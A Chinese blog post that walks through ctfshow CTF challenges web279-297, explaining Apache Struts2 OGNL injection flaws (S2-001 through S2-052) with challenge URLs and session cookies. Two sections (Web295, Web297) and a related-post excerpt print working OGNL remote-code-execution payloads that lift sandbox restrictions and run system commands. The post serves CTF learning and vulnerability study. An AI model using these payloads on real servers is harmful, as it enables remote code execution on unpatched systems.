Java漏洞复现(ctfshow279-297)strust 漏洞复现及原理解释

于 2024-07-27 11:08:17 发布
阅读量809 收藏 12
点赞数 20
文章标签: java 开发语言 网络安全 ctfshow strust
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74402888/article/details/140724678
版权

Java漏洞复现

Strust原理

JavaEE--------Struts2框架-CSDN博客

Web279

struts2漏洞 S2-001是当用户提交表单数据且验证失败时,服务器使用OGNL表达式解析用户先前提交的参数值,%{value}并重新填充相应的表单数据。

这里的%{value}简单理解就是和flask的模板注入{{}}差不多 会对里面的内容进行解析

因此我们可以利用其进行命令执行

访问:

https://a92d64a9-8002-46d5-8f59-f11865ad32ad.challenge.ctf.show/S2-001/login.action

添加cookie:

JSESSIONID=7E8A2700754C4F23FB59EA13B5E66258

利用工具扫描漏洞

命令执行:

env

Web280

struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(u0023)或8进制(43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻击者可以利用OGNL表达式将这2个选项打开

https://b3db2c9f-0e82-443b-9c65-9ad58b5396ba.challenge.ctf.show/S2-005/example/HelloWorld.action

添加cookie

JSESSIONID=48532210EF370D206347C46234D5D001

工具扫描命令执行env

Web281

描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行。

https://8936a353-7a11-4429-bcb7-65f6d498efd5.challenge.ctf.show/S2-007/user.action

工具扫描出漏洞

env

Web282

2.3.1.1 之前的 Apache Struts 中的 CookieInterceptor 组件不使用参数名称白名单,这允许远程攻击者通过精心制作的 HTTP Cookie 标头执行任意命令,该标头通过静态方法触发 Java 代码执行。

访问

https://b1c01aa2-1742-47fa-b3aa-ff1eaa81c211.challenge.ctf.show/S2-008/cookie.action

添加cookie:

JSESSIONID=26F7F9791FA8F9734A2DD062764A7ED5

命令执行:env

Web283

Struts2对S2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;后来Struts2对S2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线。

但是,如果当前action中接受了某个参数example,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在example参数中,然后使用/helloword.acton?example=<OGNL statement>&(example)('xxx')=1的方法来执行它,从而绕过官方对#、\等特殊字符的防御。

影响版本Struts 2.1.0-2.3.1.1

https://6b357185-faa4-4d43-963f-ba528b32cb1f.challenge.ctf.show/S2-009/showcase.action

添加cookie:

JSESSIONID=26F7F9791FA8F9734A2DD062764A7ED5

命令执行:env

Web284

原理:

从漏洞公告中获悉漏洞会出现的场景:如果一个Action定义了一个变量比如uname,当触发了redirect类型的返回时,如果重定向的url后面带有?uname=${uname},则在这个过程中会对uname参数的值进行OGNL表达式计算。

https://0a239cda-2512-44c9-83ed-07670463fa01.challenge.ctf.show/S2-012/user.action

添加cookie:

JSESSIONID=26F7F9791FA8F9734A2DD062764A7ED5

命令执行:env

Web285

漏洞原理:

Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下:

none - 链接不包含请求的任意参数值(默认)

get - 链接只包含 GET 请求中的参数和其值

all - 链接包含 GET 和 POST 所有参数和其值

<s:a>用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。在放置参数的过程中会将参数进行OGNL渲染,造成任意命令执行漏洞

访问页面;

https://5e53e6c4-6db0-450a-ad90-5d0eddc60b37.challenge.ctf.show/S2-013/link.action

添加cookie:

JSESSIONID=26F7F9791FA8F9734A2DD062764A7ED5

命令执行:env

Web286

漏洞原理:

漏洞产生于配置了 Action 通配符 *,并将其作为动态值时,解析时会将其内容执行 OGNL 表达式,例如:

<package name="S2-015" extends="struts-default">

    <action name="*" class="com.demo.action.PageAction">

        <result>/{1}.jsp</result>

    </action>

</package>

上述配置能让我们访问 name.action 时使用 name.jsp 来渲染页面,但是在提取 name 并解析时,对其执行了 OGNL 表达式解析,所以导致命令执行。在实践复现的时候发现,由于 name 值的位置比较特殊,一些特殊的字符如 / " \ 都无法使用(转义也不行),所以在利用该点进行远程命令执行时一些带有路径的命令可能无法执行成功

还有需要说明的就是在 Struts 2.3.14.1 - Struts 2.3.14.2 的更新内容中,删除了 SecurityMemberAccess 类中的 setAllowStaticMethodAccess 方法,因此在 2.3.14.2 版本以后都不能直接通过 #_memberAccess['allowStaticMethodAccess']=true 来修改其值达到重获静态方法调用的能力

访问网页

https://ff65f398-559d-4601-994e-befe0c0e4c1e.challenge.ctf.show/S2-015/welcome.action

添加cookie:

JSESSIONID=26F7F9791FA8F9734A2DD062764A7ED5

命令执行:env

Web287

漏洞原理:

在struts2中,DefaultActionMapper类支持以"action:"、“redirect:”、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java静态方法执行任意系统命令

所以,访问http://your-ip:8080/index.action?redirect:OGNL表达式即可执行OGNL表达式

影响版本: 2.0.0 - 2.3.15

访问网页

https://3373d80f-d16a-4c00-8cf2-a162c1a44fd2.challenge.ctf.show/S2-016/default.action

添加cookie:

JSESSIONID=26F7F9791FA8F9734A2DD062764A7ED5

命令执行:env

Web288

漏洞原理

动态方法调用的默认启用,原理类似于s2-008

Apache Struts 2的“Dynamic Method Invocation”机制是默认开启的,仅提醒用户如果可能的情况下关闭此机制,这样就存在远程代码执行漏洞,远程攻击者可利用此漏洞在受影响应用上下文中执行任意代码

访问网页

https://e78af4f0-f8a5-401d-94ae-72a7f91c6b28.challenge.ctf.show/S2-019/example/HelloWorld.action

添加cookie:

JSESSIONID=26F7F9791FA8F9734A2DD062764A7ED5

命令执行:env

Web289

漏洞原理

Struts框架被强制执行时,对分配给某些标签的属性值进行双重评估,因此可以传入一个值,当一个标签的属性将被渲染时,该值将被再次评估

例如:代码执行过程大致为先尝试获取value的值,如果value为空,那么就二次解释执行了name。并且在执行前给name加上了”%{}”。最终造成二次执行

影响版本:Struts 2.0.0 - Struts 2.3.24.1(2.3.20.3除外)

访问网页

https://1908b8d7-efee-4780-96b5-c6b1b6a63659.challenge.ctf.show/S2-029/default.action

添加cookie:

JSESSIONID=26F7F9791FA8F9734A2DD062764A7ED5

命令执行:env

Web290

漏洞原理

Struts2在开启了动态方法调用(Dynamic Method Invocation)的情况下,可以使用method:<name>的方式来调用名字是<name>的方法,而这个方法名将会进行OGNL表达式计算,导致远程命令执行漏洞

影响版本: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3)

访问网页

https://efb96afc-c69b-4efa-847c-0a59c83658cd.challenge.ctf.show/S2-032/memoedit.action?id=3

添加cookie:

JSESSIONID=26F7F9791FA8F9734A2DD062764A7ED5

命令执行:env

Web291

漏洞原理

当开启动态方法调用,并且同时使用了Strut2 REST Plugin插件时,使用“!”操作符调用动态方法可能执行ognl表达式,导致代码执行

影响版本:Struts 2.3.20 – Struts 2.3.28 (不包括 2.3.20.3和 2.3.24.3)

访问网页

https://2af2db99-e298-45ce-8d9f-e9cbf9750142.challenge.ctf.show/S2-033/orders

添加cookie:

JSESSIONID=26F7F9791FA8F9734A2DD062764A7ED5

命令执行:env

Web292

漏洞原理

与s2-045类似,但是输入点在文件上传的filename值位置,并需要使用\x00截断

影响版本:Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10

访问网页

https://8eb617fc-e8b9-4156-b25a-0037c79423d5.challenge.ctf.show/S2-037/orders

添加cookie:

JSESSIONID=26F7F9791FA8F9734A2DD062764A7ED5

命令执行:env

Web293

漏洞原理

在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵

恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令

影响版本:Struts 2.3.5 – Struts 2.3.31 Struts 2.5 – Struts 2.5.10

访问网页

https://03ddefd2-67c3-4933-8319-d8496c27377c.challenge.ctf.show/S2-045/orders

添加cookie:

JSESSIONID=26F7F9791FA8F9734A2DD062764A7ED5

命令执行:env

Web294

漏洞原理:

与s2-045类似,但是输入点在文件上传的filename值位置,并需要使用\x00截断

影响版本:Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10

访问网页

https://0e4071fd-26d8-49c8-9ee1-8128789597c5.challenge.ctf.show/S2-046/doUpload.action

添加cookie:

JSESSIONID=26F7F9791FA8F9734A2DD062764A7ED5

命令执行:env

Web295

漏洞原理

漏洞主要问题出在struts2-struts1-plugin这个插件包上。这个库的主要作用就是将struts1的action封装成struts2的action以便它能在strut2上运行使用

而由于struts2-struts1-plugin 包中的 “Struts1Action.java” 中的 execute 函数可以调用 getText() 函数,这个函数刚好又能执行OGNL表达式,同时这个 getText() 的 参数输入点,又可以被用户直接进行控制,如果这个点被恶意攻击者所控制,就可以构造恶意执行代码,从而实现一个RCE攻击

影响版本: 2.0.0 - 2.3.32

访问网页

https://550f7b64-9a87-43e3-991b-1effb6b8b618.challenge.ctf.show/S2-048/viewSource.action?config=file:/usr/local/tomcat/webapps/S2-048/WEB-INF/classes/struts.xml:78&className=com.opensymphony.xwork2.ActionSupport&page=///WEB-INF/showcase.jsp

工具扫描:

Poc:

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('env').getInputStream())).(#q)}

Web296

漏洞原理

Struts2-Rest-Plugin是让Struts2能够实现Restful API的一个插件,其根据Content-Type或URI扩展名来判断用户传入的数据包类型,有如下映射表:

扩展名 Content-Type 解析方法

xml application/xml xstream

json application/json jsonlib或jackson(可选)

xhtml application/xhtml+xml 无

无 application/x-www-form-urlencoded 无

无 multipart/form-data 无

jsonlib无法引入任意对象,而xstream在默认情况下是可以引入任意对象的(针对1.5.x以前的版本),方法就是直接通过xml的tag name指定需要实例化的类名:

<classname></classname>

//或者

<paramname class="classname"></paramname>

所以,我们可以通过反序列化引入任意类造成远程命令执行漏洞,只需要找到一个在Struts2库中适用的gedget

影响版本:Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12

访问网页

https://4c25fcc4-d874-4020-ab16-ff1529cba4c5.challenge.ctf.show/S2-052/orders/3/edit

添加cookie:

JSESSIONID=26F7F9791FA8F9734A2DD062764A7ED5

命令执行:env

Web297

漏洞原理

Struts2在使用Freemarker模板引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞

访问网页

Poc:

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='env').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

添加cookie:

JSESSIONID=26F7F9791FA8F9734A2DD062764A7ED5

命令执行:env

CTFshow刷题日记-WEB-JAVA(web279-300)Struts2全漏洞复现,Java漏洞复现-CSDN博客

小春学渗透
关注
  • 20
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Struts2 S2-046漏洞复现 (CVE-2017-5638)
1
05-27 3748
一:漏洞介绍 名称: struts2-046 远程代码执行 (CVE-2017-5638) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导
JAVA-JSP-strust2-sql server电子政务网(源码+数据库sql+lun文+视频齐全).zip
02-01
这是一个基于JAVA、JSP、Struts2框架与SQL Server数据库构建的电子政务系统项目资源包。这个压缩包包含了完整的源代码、数据库SQL脚本、文档(lunwen)以及相关教学视频,为学习和理解电子政务系统开发提供了一个...
ctfshowJAVA
njh18790816639的博客
04-16 3262
web279~279 这里便是跑脚本的事了! python Struts2Scan.py -u http://892a1226-9adc-4c5b-a700-c1ba9ca6ee26.challenge.ctf.show:8080/login.action 然后进行利用 python Struts2Scan.py -u http://892a1226-9adc-4c5b-a700-c1ba9ca6ee26.challenge.ctf.show:8080/login.action -n S2-009 --e
CTFshow Java
starttv的博客
11-17 1430
OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻击者可以利用OGNL表达式将这2个选项打开,S2-003的修补方案把自己上了一个锁,但是把锁钥匙给插在了锁头上。通常tomcat的做法是解压,编译里面的代码,所以当文件很多的时候,tomcat的启动会很慢。
ctfshow java (web 279-300)选做
最新发布
ljc13626678577的博客
07-12 1088
ctfshow里面关于java的题目都和struct2专题有关,另外有少量的代码审计的题目。出于效率的考虑,选择选做一些题目。浅浅做几题尝试一下。
ctfshow- java
qq_45951598的博客
08-25 561
web279-294 296-297 yu师傅脚本通杀 下载 下载链接:https://pan.baidu.com/s/19yr0tWbG1UU_ULjEan5ttQ 提取码:bn71 具体用法在md文件中,例如 检测 python Struts2Scan.py -u http://94c4c47e-4fb3-408c-97d7-56a5094f84a7.chall.ctf.show/S2-001/login.action 利用 python Struts2Scan.py -u http://94c4c47
ctfshow java
SopRomeo的博客
01-27 1076
web279 这个编号有点奇怪,搜搜 漏洞讲解 里面有payload直接用,我不知道啥原因echo FLAG flag不出来 因为这是动态靶机,直接看/proc/self/environ %{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/proc/self/environ"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.
CTFSHOW JAVA
羽的博客
12-17 3765
WEB279-294 296-297 脚本通杀 下载 下载链接:https://pan.baidu.com/s/19yr0tWbG1UU_ULjEan5ttQ 提取码:bn71 具体用法在md文件中,例如 检测 python Struts2Scan.py -u http://94c4c47e-4fb3-408c-97d7-56a5094f84a7.chall.ctf.show/S2-001/login.action 利用 python Struts2Scan.py -u http://94c4c47e-4f
JAVA-JSP-strust2-sql server 电子 务网源码 数据库sql
01-30
基于Javaee的影视创作论坛的设计与实现主要用功能包括: 首页推荐、用户管理、影片管理、评论管理、 ... (1)后台管理: 管理模块:管理员的登录与退出、管理员个人信息的设置 电影管理模块:实现电影信息的增加、...
1.3JAVA-JSP-strust2-sql server电子政务网(源码+数据库sql+lun文+视频齐全).rar
03-03
1.3JAVA_JSP_strust2_sql server电子政务网(源码+数据库sql+lun文+视频齐全).rar JAVA、JSP电子政务网主要用于实现政府机关的政务管理,基本功能包括:前台管网展示、留言板、后台登陆、修改密码、网站公告、政府...
JAVA-JSP-strust2-sql server企业合同管理系统(源码+数据库sql+lun文+视频齐全).zip
02-02
这是一个基于JAVA技术、JSP页面展示、Struts2框架以及SQL Server数据库的企业合同管理系统。该系统提供了全面的合同管理功能,包括合同的录入、查询、修改、删除等操作,适用于中小型企业进行合同的信息化管理。下面...
CTFSHOW web入门 java反序列化篇 web855
羽的博客
12-13 1978
ctfshow java反序列化
CtfshowJava反序列化
weixin_56537388的博客
08-15 521
发现进入URLsteamhander,他的hashcode使用了getAddress,我们最终要做的就是调用getaddress,获取DNS解析。调用hashmap最后调用的是url的hashcode方法,在最后调用getaddress。重写是子类对父类可以访问方法的重新编写,返回值和形参都不能改变,可以看到,put的时候调用了hashcode,不是-1了。,子类对象赋值给父类使用,但是不能访问在子类特有的方法。这里的初始值是-1,只有为-1才能传数据。ysoserial工具。这里使用了重写的概念。
【Web】CTFSHOW java刷题记录(全)
uuzeray的博客
02-17 1377
给了war包,解压得到class文件,用java反编译工具来读源码。进行一波S2-009 showcase rce的搜。直接访问/getFlag路径回显如下,这条路走不通。不能直接读环境变量,拿个whoami意思一下(进行一波S2-008 devmode的搜。打不出来啊,只能用羽师傅的脚本了。进行一波S2-037的搜。进行一波S2-045的搜。进行一波S2-032的搜。进行一波S2-033的搜。进行一波S2-016的搜。进行一波S2-019的搜。进行一波S2-029的搜。进行一波S2-048的搜。
JeeSite3.0框架Shiro序列化漏洞修复解决方法
weixin_43865714的博客
02-16 1792
Jeesite3.0框架项目Apache Shiro 反序列化漏洞修复
ctf刷题 ctfshow【网鼎杯】
weixin_44807430的博客
01-07 2402
纯粹学安全
关于JeeSite框架Shiro序列化漏洞修复解决方法
ying_521125的博客
11-21 3583
关于JeeSite框架Shiro序列化漏洞修复解决方法 一、升级shiro的版本 将这里改为百度上所说的那个有漏洞的版本以上的随便版本:1.2.4以上版本 这里刚开始以为修改版本就可以解决这个漏洞,然而并没有。所以产生了第二步。 二、配置动态密匙 1、找到项目shiro配置文件 2、按照源码的方式新写一个秘钥生成器 (1) 到项目种shiro目录下面新建一个类(如下图) (2) 详细代码 public class GenerateCipherKey { /** * 随机生成密匙
CTFshow刷题日记-WEB-JAVA(web279-300)Struts2全漏洞复现Java漏洞复现
热门推荐
Love&Share
10-12 1万+
全部题都是struts2框架漏洞 Struts2是用Java语言编写的一个基于MVC设计模式的Web应用框架 关于struts2漏洞,vulhub都有环境并且给出了漏洞原理和poc GitHub项目地址:https://github.com/vulhub/vulhub/tree/master/struts2 判断网站是否基于Struts2的方法链接 通过页面回显的错误消息来判断,页面不回显错误消息时则无效 通过网页后缀来判断,如.do .action,有可能不准 如果配置文件中常数extension的值
strust2漏洞检查工具2019下载
01-27
Struts 2是一个开源的Java Web应用程序开发框架,但也存在一些安全漏洞。下面介绍几款常用的Struts 2漏洞检查工具: 1. S2-055漏洞检查工具:该漏洞Struts 2中的一个远程代码执行漏洞,通过恶意构造的HTTP请求...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值